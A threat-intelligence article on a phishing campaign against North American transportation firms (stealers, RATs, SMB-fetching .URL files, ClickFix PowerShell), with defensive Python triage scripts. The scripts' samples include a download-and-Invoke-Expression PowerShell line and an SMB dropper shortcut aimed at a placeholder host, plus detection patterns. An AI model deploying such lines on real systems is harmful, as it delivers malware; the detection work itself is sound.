Transportation and logistics companies in North America are the targets of a phishing campaign that has been delivering a range of information stealers and remote access trojans (RATs). According to an analysis by Proofpoint, the campaign uses compromised legitimate email accounts belonging to transportation and shipping firms and replies inside existing email threads (thread hijacking), so the malicious message arrives from a known correspondent in a conversation the recipient is already part of. At least 15 compromised accounts have been identified so far, although how they were breached and who is behind the campaign remain unclear.
The primary payloads observed between May and July 2024 were Lumma Stealer, StealC, and NetSupport. In August 2024 the threat actors changed infrastructure and delivery methods and added DanaBot and Arechclient2 to the set. The attack chains typically start with a phishing email carrying an internet shortcut (.URL) attachment or a Google Drive link to one. Once the shortcut is opened, it fetches the next-stage payload from a remote server over the Server Message Block (SMB) protocol, which is why outbound SMB (TCP 445) to internet hosts from user workstations is worth blocking and alerting on.
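A .URL file is a small INI-style text file, so the SMB delivery trick above is easy to triage at the mail gateway or in a sandbox: parse the `[InternetShortcut]` section and flag any field that Windows will resolve over the network (a UNC path such as `\\host\share\...` or a `file://` URL with a remote host). The following is an added example written for this page, not code from Proofpoint or from the campaign; the shortcut contents and the 203.0.113.10 host are constructed placeholders.

```python
"""Triage Windows Internet Shortcut (.URL) files for remote SMB targets.

Added example, not Proofpoint's code. The sample shortcut contents below are
constructed; the host 203.0.113.10 is a documentation-range placeholder.
"""
import re
from urllib.parse import urlparse

# Fields in [InternetShortcut] that Explorer resolves when the shortcut is
# opened or merely rendered; any of them can point at a remote SMB share.
WATCHED_KEYS = ("url", "iconfile", "workingdirectory")

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")  # \\host\share\...


def parse_url_file(text):
    """Return {key_lower: value} for the [InternetShortcut] section only."""
    fields = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def remote_smb_host(value):
    """Return the remote host a value resolves over SMB, or None.

    Two spellings are covered: a bare UNC path and a file:// URL whose
    authority is a remote host. file:///C:/... (no host) is local and ignored.
    """
    m = UNC_RE.match(value)
    if m:
        return m.group(1)
    parsed = urlparse(value)
    if (parsed.scheme.lower() == "file" and parsed.netloc
            and parsed.netloc.lower() != "localhost"):
        return parsed.netloc
    return None


def triage_url_file(text):
    """Return a list of (field, host) findings for one .URL file's contents."""
    fields = parse_url_file(text)
    findings = []
    for key in WATCHED_KEYS:
        if key in fields:
            host = remote_smb_host(fields[key])
            if host:
                findings.append((key, host))
    return findings


# Constructed samples: one ordinary web shortcut, one SMB dropper.
SAMPLES = {
    "benign": "\n".join([
        "[InternetShortcut]",
        "URL=https://www.example.com/",
    ]),
    "smb_dropper": "\n".join([
        "[InternetShortcut]",
        "URL=file://203.0.113.10/share/invoice.exe",
        r"IconFile=\\203.0.113.10\share\icon.ico",
    ]),
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, triage_url_file(text))
```

The IconFile field is checked as well as URL because Explorer resolves the icon path when it draws the file listing, so a remote icon reference leaks an SMB connection (and the user's NTLM handshake) before anyone double-clicks anything. Run the triage over attachments at the gateway and quarantine any shortcut that yields a finding.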
Some variants of the campaign use the ClickFix technique: a page claims that a document cannot be displayed in the browser and offers a "fix", which is actually a Base64-encoded PowerShell command the victim is told to copy and paste into a PowerShell terminal. Running it starts the DanaBot infection chain, with the user rather than an exploit doing the execution. The campaign's focus on the sector also shows in the software it impersonates, which is fleet and freight tooling such as Samsara, AMB Logistic, and Astra TMS, an indication that the attackers research their targets before sending lures.
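The ClickFix step leaves a distinctive trace: a `powershell.exe` process whose command line carries `-EncodedCommand` (or any prefix of it, down to `-e`) followed by Base64 text, and that Base64 decodes as UTF-16LE rather than UTF-8. The following added example, not code from Proofpoint or the campaign, decodes such command lines from process-creation telemetry and tags the usual follow-on behaviours (remote fetch, Invoke-Expression, hidden window). The command lines and the script they carry are constructed for this page; the URL in the script is a placeholder.

```python
"""Decode and triage PowerShell -EncodedCommand invocations from process logs.

Added example, not Proofpoint's code. The command lines below are constructed
and the script they carry is a harmless placeholder.
"""
import base64
import re

# One switch/value pair on a PowerShell command line: -flag value
FLAG_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")

# Behaviours worth tagging once the script is readable.
SCRIPT_INDICATORS = [
    ("remote fetch", re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")),
    ("dynamic execution", re.compile(r"(?i)invoke-expression|\biex\b")),
    ("nested encoding", re.compile(r"(?i)frombase64string")),
]
HIDDEN_WINDOW_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")


def extract_encoded_commands(cmdline):
    """Return the Base64 blobs passed via any unambiguous prefix of -EncodedCommand.

    PowerShell accepts -e, -ec, -enc, ... as abbreviations, so the check is
    'is this flag a prefix of encodedcommand', not an exact match.
    """
    blobs = []
    for flag, blob in FLAG_RE.findall(cmdline):
        if "encodedcommand".startswith(flag.lower()):
            blobs.append(blob)
    return blobs


def decode_encoded_command(blob):
    """-EncodedCommand is Base64 over UTF-16LE; decoding as UTF-8 yields junk."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def encode_command(script):
    """Inverse of the above; used here only to build constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage_cmdline(cmdline):
    """Return {'decoded': [scripts...], 'indicators': [labels...]} for one command line."""
    decoded = []
    indicators = set()
    for blob in extract_encoded_commands(cmdline):
        try:
            script = decode_encoded_command(blob)
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; skip rather than crash
        decoded.append(script)
        for label, pattern in SCRIPT_INDICATORS:
            if pattern.search(script):
                indicators.add(label)
    if HIDDEN_WINDOW_RE.search(cmdline):
        indicators.add("hidden window")
    return {"decoded": decoded, "indicators": sorted(indicators)}


# Constructed samples: a ClickFix-style launcher, an admin script, a benign one-liner.
SCRIPT = ("$c = New-Object Net.WebClient; "
          "Invoke-Expression $c.DownloadString('http://203.0.113.10/fix.ps1')")
SAMPLE_LOGS = [
    "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_command(SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -enc " + encode_command("Get-Date"),
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(triage_cmdline(line))
```

Feed this Sysmon Event ID 1 or EDR process-creation records; an encoded command whose parent is `explorer.exe` and whose decoded body fetches and evaluates remote content is the ClickFix pattern described above, regardless of which payload it ultimately drops.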
The campaign fits a broader trend in the information-stealing malware landscape, where new strains keep appearing; Angry Stealer and BLX Stealer are among the recent additions. For the transportation sector the practical lesson is that the lures arrive from trusted senders inside real threads, so defences need to cover the delivery mechanics (blocking .URL attachments and outbound SMB, and alerting on encoded PowerShell launched from a user session) rather than relying on recipients to spot a suspicious message.